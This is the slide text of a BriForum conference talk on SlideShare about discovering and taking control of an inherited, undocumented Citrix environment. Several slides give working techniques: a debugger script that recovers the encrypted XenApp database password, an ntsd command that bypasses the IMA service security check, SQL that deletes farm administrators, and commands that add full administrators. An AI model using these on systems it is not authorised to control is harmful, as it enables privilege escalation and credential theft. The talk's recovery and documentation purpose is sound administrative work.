WelcomeBriForum   |   © TechTarget
So, You Just Inherited SomeoneElses Citrix Environment. HowDo You Figure out Whats What?Denis GundarevConsultantEntisys So...
About presenterC:>whoami /allUSER INFORMATION----------------User Name       Twitter Name E-Mail============== ===========...
Disclaimer● Information in this presentation is intended for  educational purposes only. Some topics in this  presentation...
Agenda●    Why you need to hack your Citrix environment?●    How to find your servers?●    pwn Windows boxes●    pwn Windo...
Why do you need to hack your Citrixenvironment?1. Install 10 XenApp Servers2. Wait for one year3. Try to remember the ODBC...
How to start your investigationBriForum   |   © TechTarget       7
How to find at least one XenApp Server● Use ipscan to find at least one server with open ports  1494 and 2598● Open ICA fi...
How to Find Other Servers● CTX101810 - Communication Ports Used By Citrix  Technologies – 20 pages● VMware KB 1012382● Mic...
Thank you, Captain ObviousBriForum   |   © TechTarget                                10
Find all servers in the farm using XML● Use XmlServiceDigger/XmlServiceExplorer from Nicholas  Dille (sepago)BriForum   | ...
Find all servers in the farm using ICA Client1.   set client = WScript.CreateObject("Citrix.ICAClient")2.   client.SetProp...
Find All HTTP clients● On XenApp server – change XML Service to be shared  with IIS● Look for the IIS logs, all http clien...
What can be a HTTP Client?●    WebInterface●    NetScaler●    Program Neighborhood●    ICA files with HTTPBrowserAddress  ...
Physical or Virtual?● Why we need this info?       - To get administrative access in most cases you need the         “phys...
Breaking into hypervisor● XenServer - CTX116019● VMware ESX - KB1317898, same procedure as for  XenServer● VMware ESXi – p...
Get Access to the Windows Box● Use domain admin account or GPO to get access (if  possible)● Sometimes you need to reset l...
Get Access to the Windows Box● Requirements:       - Access to the physical console       - Offline NT Password and Regist...
Get Access to the Windows Box - DemoBriForum   |   © TechTarget            19
XenApp ODBC Password● SQL Server name and database name is stored in  MF20.dsn● Username and password Stored in  HKEY_LOCA...
XenApp ODBC Password - DEMOBriForum   |   © TechTarget   21
XenApp ODBC Password - DEMO● CryptoAPI tracer http://tinyurl.com/CryptoAPITracer!sym quiet;bp Crypt32!CryptUnprotectData "...
SlimJim● Deletes all Citrix administrators from the data store to  allow control of the farm by the local administrator.● ...
SlimJim for XenApp 6.51. delete indextable FROM KEYTABLE INNER JOIN   INDEXTABLE ON KEYTABLE.nodeid = INDEXTABLE.nodeid   ...
SlimJim for XenApp 6.5BriForum   |   © TechTarget   25
SlimJim for XenApp 6.5 - Easiest way● Download SlimJim for XenApp 6 from  http://citrixtechs.com/blog/?p=56 (thanks to Car...
SlimJim for XenApp 6.5 - Easiest way (Cont..)● What it actually do?1. start ntsd -pn imasrv.exe -pd -c "bu    ImaRass!CtxS...
Get access to the SQL DB● By default, NT AUTHORITYSYSTEM has a sysadmin  roleBriForum   |   © TechTarget                  ...
BriForum   |   © TechTarget   29
XenDesktopBriForum   |   © TechTarget   30
XenDesktop●    Add-PSSnapin citrix.*●    New-BrokerAdministrator -Name corptest -FullAdmin 1●    New-AcctAdministrator -Ac...
Provisioning Services1. INSERT INTO [AuthGroup]2. ([authGroupId]3. ,[authGroupName]4. ,[authGroupGuidName]5. ,[description...
Find your clientsBriForum   |   © TechTarget
XenApp● Configure Resource Manager, then use SQL Report  Builder to create reports (or just export data to Excel )● Insta...
XenApp on Windows 2003● Use security log● Schedule a simple script:       -       Set objFarm = CreateObject("MetaFrameCOM...
XenApp on Windows 2008● Use dedicated log Microsoft-Windows-TerminalServices-  LocalSessionManager/Operational●    Attach ...
XenDesktop● Configure retention period for a connection log entries       - HKEY_LOCAL_MACHINESoftwareCitrixDesktopServerL...
NetScaler● Configure Web Logging on Windows box (or Linux, if you  like ) to get logs in standard W3C or NCSA formats    ...
What else?●    XenServer – try to run “xe secret-list ” at home●    Licensing Server – Just edit configuration files●    X...
Conclusion●    1. Use Goggle●    2. Explore SQL databases●    3. Learn how to use Windows Debugger●    4. Read SDK documen...
TBD: put some funny picture on the last slideBriForum   |   © TechTarget                     41
Upcoming SlideShare
Loading in …5
×

How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment. How Do You Figure out What's What?)

24,547 views

Published on

Imagine that you just found the new job of your dreams: You are now a system administrator in a large enterprise. Everything is going like clockwork, except for one major problem: There are 5 different versions of Presentation Server in use and there is no documentation for any system. Now imagine you are a consultant ready to do an assessment of Citrix infrastructure, but nobody in the company knows how many farms and servers exist, or how they are configured. (Wanting a new imaginary job yet?) In this session, Denis Gundarev will share tips on how to document infrastructure and tricks on how to find all components or users that are "forgotten." Attendees will learn several methods for elevating permissions and taking ownership of forgotten systems.

Published in: Technology
0 Comments
11 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
24,547
On SlideShare
0
From Embeds
0
Number of Embeds
51
Actions
Shares
0
Downloads
0
Comments
0
Likes
11
Embeds 0
No embeds

No notes for slide

How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment. How Do You Figure out What's What?)

  1. 1. WelcomeBriForum | © TechTarget
  2. 2. So, You Just Inherited SomeoneElses Citrix Environment. HowDo You Figure out Whats What?Denis GundarevConsultantEntisys SolutionsBriForum | © TechTarget
  3. 3. About presenterC:>whoami /allUSER INFORMATION----------------User Name Twitter Name E-Mail============== ============ ==================ENTISYSdenisg @fdwl DenisG@entisys.comGROUP INFORMATION-----------------Group Name Type SID============================== ================ =================Citrix Technology Professional Well-known group S-1-5-32-544Citrix Certified Instructor Hobby S-1-5-32-545Microsoft Certified Trainer Hobby S-1-5-32-546BriForum | © TechTarget 3
  4. 4. Disclaimer● Information in this presentation is intended for educational purposes only. Some topics in this presentation may contain the information related to “Hacking Passwords” or “Elevating permissions” (Or Similar terms). This topics provide information about the legal ways of retrieving the passwords. You shall not misuse the information to gain unauthorized access. However you may try out these hacks on your own computer at your own risk.● Some of the stuff that you will learn is dangerous, playing with this knowledge on your production environment can make you very unhappyBriForum | © TechTarget 4
  5. 5. Agenda● Why you need to hack your Citrix environment?● How to find your servers?● pwn Windows boxes● pwn Windows-based Citrix products● pwn *NIX-based Citrix products● How to find your clientsBriForum | © TechTarget 5
  6. 6. Why do you need to hack your Citrixenvironment?1. Install 10 XenApp Servers2. Wait for one year3. Try to remember the ODBC password to add more servers1. Change your password on Friday2. Go to the night club3. …4. PROFIT!!BriForum | © TechTarget 6
  7. 7. How to start your investigationBriForum | © TechTarget 7
  8. 8. How to find at least one XenApp Server● Use ipscan to find at least one server with open ports 1494 and 2598● Open ICA file downloaded from the WebInterface/PNAgent siteBriForum | © TechTarget
  9. 9. How to Find Other Servers● CTX101810 - Communication Ports Used By Citrix Technologies – 20 pages● VMware KB 1012382● Microsoft - http://technet.microsoft.com/en- us/library/cc875824.aspx & KB832017BriForum | © TechTarget
  10. 10. Thank you, Captain ObviousBriForum | © TechTarget 10
  11. 11. Find all servers in the farm using XML● Use XmlServiceDigger/XmlServiceExplorer from Nicholas Dille (sepago)BriForum | © TechTarget 11
  12. 12. Find all servers in the farm using ICA Client1. set client = WScript.CreateObject("Citrix.ICAClient")2. client.SetProp "HTTPBrowseraddress", WScript.Arguments(0)3. WScript.Echo("Farm:" +client.GetEnumNameByIndex(client.EnumerateFarms(), 0))4. servers = client.EnumerateServers()5. do while j < client.GetEnumNameCount(servers)6. WScript.Echo("SERVER:" +client.GetEnumNameByIndex(servers, j))7. j=j+18. LoopBriForum | © TechTarget 12
  13. 13. Find All HTTP clients● On XenApp server – change XML Service to be shared with IIS● Look for the IIS logs, all http clients will be thereBriForum | © TechTarget 13
  14. 14. What can be a HTTP Client?● WebInterface● NetScaler● Program Neighborhood● ICA files with HTTPBrowserAddress - TCP/UDP browser is not supported from ICA Client 11.1BriForum | © TechTarget 14
  15. 15. Physical or Virtual?● Why we need this info? - To get administrative access in most cases you need the “physical” access to the server● Get MAC address, lookup it using MAC address DB: - http://www.coffer.com/mac_find - 00-15-5D – Hyper-V - 00-50-56 – VMWare - Random – XenServer● Find hypervisor host - Hyper-V – HKLMSOFTWAREMicrosoftVirtual MachineGuestParametersPhysicalHostNameFullyQualified - Vmware, XenServer – packet captureBriForum | © TechTarget 15
  16. 16. Breaking into hypervisor● XenServer - CTX116019● VMware ESX - KB1317898, same procedure as for XenServer● VMware ESXi – password reset not supported, but possible http://tinyurl.com/ResetESXiPass● Hyper-V – just a Windows, next topicBriForum | © TechTarget 16
  17. 17. Get Access to the Windows Box● Use domain admin account or GPO to get access (if possible)● Sometimes you need to reset local admin password - Access to non-domain servers - “broken” Provisioning services .vhd - Domain controllersBriForum | © TechTarget 17
  18. 18. Get Access to the Windows Box● Requirements: - Access to the physical console - Offline NT Password and Registry editor (http://pogostick.net/~pnh/ntpasswd/)● Bonus – reset domain admin account password - SrvAny from resource kitBriForum | © TechTarget 18
  19. 19. Get Access to the Windows Box - DemoBriForum | © TechTarget 19
  20. 20. XenApp ODBC Password● SQL Server name and database name is stored in MF20.dsn● Username and password Stored in HKEY_LOCAL_MACHINESOFTWAREWow6432Node CitrixIMADatastore● L$ImaDBPassword and L$ImaDBUsername are encrypted● DSMAINT CONFIG is able to encrypt this dataBriForum | © TechTarget 20
  21. 21. XenApp ODBC Password - DEMOBriForum | © TechTarget 21
  22. 22. XenApp ODBC Password - DEMO● CryptoAPI tracer http://tinyurl.com/CryptoAPITracer!sym quiet;bp Crypt32!CryptUnprotectData "bp /t @$thread poi(@esp) "; du poi(poi(@esp-4)+4); G;";G;";!sym quiet;*.srcnoisy 0;sxi ld.outmask- 0xFFFFFFEE $$ .outmask /d restores the output mask to default* Create the log and begin*.logopen "c:log.txt";Ggq• Run debugger: • cdb -cf c:showpass.txt dsmaint config /user:<username>BriForum | © TechTarget 22
  23. 23. SlimJim● Deletes all Citrix administrators from the data store to allow control of the farm by the local administrator.● Works only on the CPS/XA5● Directly execute the SQL commands that delete any administrators configured● Doesn’t work on XA6/6.5 because of new DB schemaBriForum | © TechTarget 23
  24. 24. SlimJim for XenApp 6.51. delete indextable FROM KEYTABLE INNER JOIN INDEXTABLE ON KEYTABLE.nodeid = INDEXTABLE.nodeid WHERE (KEYTABLE.parentid = 42)2. go3. delete KEYTABLE from KEYTABLE where parentid=424. go● Where this “42” is coming from? - DSView from supportdebug folder on XenApp CD - Directory->ServerNeighborhoods-><FarmName>->AdminTool->Users cidBriForum | © TechTarget 24
  25. 25. SlimJim for XenApp 6.5BriForum | © TechTarget 25
  26. 26. SlimJim for XenApp 6.5 - Easiest way● Download SlimJim for XenApp 6 from http://citrixtechs.com/blog/?p=56 (thanks to Carl Lenocker!)● Install Windows Debugging tools● Run Batch fileBriForum | © TechTarget 26
  27. 27. SlimJim for XenApp 6.5 - Easiest way (Cont..)● What it actually do?1. start ntsd -pn imasrv.exe -pd -c "bu ImaRass!CtxSecurityCheck;r $t0 = %loopcount%;.while(@$t0){r $t0 = @$t0-1;pa @$ra;r eax=0x00000001;g};pa @$ra;r eax=0x00000001;.detach;q" - Attaches debugger to the IMA Service and bypass security check2. cscript addadmin-mod.wsf: - Set theFarm = CreateObject("XenappCOM.XenappFarm") - Set NewAdmin = theFarm.AddAdmin - NewAdmin.AdminType = MFAdminPermissionFullAccess - NewAdmin.Enable = 1 - NewAdmin.AAType = MFAccountAuthorityNTDomain - NewAdmin.AAName = computername - NewAdmin.AccountType = MFAccountLocalGroup - NewAdmin.AccountName = "Administrators" - NewAdmin.SaveDataBriForum | © TechTarget 27
  28. 28. Get access to the SQL DB● By default, NT AUTHORITYSYSTEM has a sysadmin roleBriForum | © TechTarget 28
  29. 29. BriForum | © TechTarget 29
  30. 30. XenDesktopBriForum | © TechTarget 30
  31. 31. XenDesktop● Add-PSSnapin citrix.*● New-BrokerAdministrator -Name corptest -FullAdmin 1● New-AcctAdministrator -Account corptest● New-PvsVmAdministrator -Account corptest● New-ConfigAdministrator -Account corptest● New-HypAdministrator -Account corptest● New-ProvAdministrator -Account corptestBriForum | © TechTarget 31
  32. 32. Provisioning Services1. INSERT INTO [AuthGroup]2. ([authGroupId]3. ,[authGroupName]4. ,[authGroupGuidName]5. ,[description])6. VALUES (‘UNIQUE00-GUID-4D0D-B834-15EA4A9F41EA7. ,N‘DOMAIN.FQDN.COM/Users/Domain Users8. ,Nde56c6b1-06ef-4ed6-85b8-a130f036d0759. ,)10. GO11. INSERT INTO [AuthGroupFarm]12. ([authGroupId])13. VALUES (UNIQUE00-GUID-4D0D-B834-15EA4A9F41EA)14. GO● de56c6b1-06ef-4ed6-85b8-a130f036d075 – GUID from adsieditBriForum | © TechTarget 32
  33. 33. Find your clientsBriForum | © TechTarget
  34. 34. XenApp● Configure Resource Manager, then use SQL Report Builder to create reports (or just export data to Excel )● Install EdgeSight, use reports● OR…● Use Event Logs - Windows 2003 – Security log - Windows 2008BriForum | © TechTarget
  35. 35. XenApp on Windows 2003● Use security log● Schedule a simple script: - Set objFarm = CreateObject("MetaFrameCOM.MetaFrameFarm") - objFarm.Initialize(1) - For Each objSession In objFarm.Sessions - WScript.Echo objSession.UserName &"," & objSession.ClientAddress - NextBriForum | © TechTarget 35
  36. 36. XenApp on Windows 2008● Use dedicated log Microsoft-Windows-TerminalServices- LocalSessionManager/Operational● Attach the same script to event● OR read registry:● HKEY_LOCAL_MACHINESOFTWARECitrixIcaSession<sessionN>ConnectionBriForum | © TechTarget 36
  37. 37. XenDesktop● Configure retention period for a connection log entries - HKEY_LOCAL_MACHINESoftwareCitrixDesktopServerL oggingConnectionLogLifetimeHours - Default period is 2 days● Use Desktop Director to analyze connections● OR● Use Get-BrokerConnectionLog powershell command to export log and analyze using excelBriForum | © TechTarget 37
  38. 38. NetScaler● Configure Web Logging on Windows box (or Linux, if you like ) to get logs in standard W3C or NCSA formats - http://support.citrix.com/article/CTX123504 - http://support.citrix.com/article/CTX123977BriForum | © TechTarget 38
  39. 39. What else?● XenServer – try to run “xe secret-list ” at home● Licensing Server – Just edit configuration files● XenServer WLB – reset Postgres password, google it● Task Manager -> Dump process -> strings – look for username -> look aroundBriForum | © TechTarget 39
  40. 40. Conclusion● 1. Use Goggle● 2. Explore SQL databases● 3. Learn how to use Windows Debugger● 4. Read SDK documentation● 5. Don’t forget about physical securityBriForum | © TechTarget 40
  41. 41. TBD: put some funny picture on the last slideBriForum | © TechTarget 41

×